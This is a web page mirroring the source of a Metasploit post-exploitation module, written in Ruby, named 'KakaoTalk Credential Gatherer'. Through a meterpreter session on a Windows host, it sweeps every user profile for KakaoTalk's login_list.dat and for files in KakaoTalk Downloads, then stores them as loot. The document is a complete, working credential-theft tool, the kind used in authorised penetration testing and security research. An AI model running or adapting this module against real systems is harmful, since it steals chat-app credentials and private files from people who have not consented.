Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/kakaotalk.rb
21552 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::Windows::UserProfiles

10
  include Msf::Post::Windows::Packrat

11
  ARTIFACTS =

12
    {

13
      application: 'Kakao',

14
      app_category: 'chats',

15
      gatherable_artifacts: [

16
        {

17
          filetypes: 'logins',

18
          path: 'LocalAppData',

19
          dir: 'Kakao',

20
          artifact_file_name: 'login_list.dat',

21
          description: 'The email address used for login',

22
          credential_type: 'text',

23
          regex_search: [

24
            {

25
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

26
              extraction_type: 'credentials',

27
              regex: [

28
                '(?i-mx:login_list.*)'

29
              ]

30
            }

31
          ]

32
        },

33
        {

34
          filetypes: 'files',

35
          path: 'MyDocs',

36
          dir: 'KakaoTalk Downloads',

37
          artifact_file_name: '*',

38
          description: 'Fiels that were downloaded to the host machine'

39
        }

40
      ]

41
    }.freeze

42


43
  def initialize(info = {})

44
    super(

45
      update_info(

46
        info,

47
        'Name' => 'KakaoTalk Credential Gatherer',

48
        'Description' => %q{

49
          This module searches for KakaoTalk credentials on a Windows host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.

50
        },

51
        'License' => MSF_LICENSE,

52
        'Author' => [

53
          'Kazuyoshi Maruta',

54
          'Daniel Hallsworth',

55
          'Barwar Salim M',

56
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org

57
        ],

58
        'Platform' => ['win'],

59
        'SessionTypes' => ['meterpreter'],

60
        'Notes' => {

61
          'Stability' => [CRASH_SAFE],

62
          'Reliability' => [],

63
          'SideEffects' => []

64
        }

65
      )

66
    )

67


68
    register_options(

69
      [

70
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

71
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

72
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

73
        # enumerates the options based on the artifacts that are defined below

74
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

75
      ]

76
    )

77
  end

78


79
  def run

80
    print_status('Filtering based on these selections:  ')

81
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

82
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

83
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

84


85
    # used to grab files for each user on the remote host

86
    grab_user_profiles.each do |userprofile|

87
      run_packrat(userprofile, ARTIFACTS)

88
    end

89


90
    print_status 'PackRat credential sweep completed'

91
  end

92
end

93


94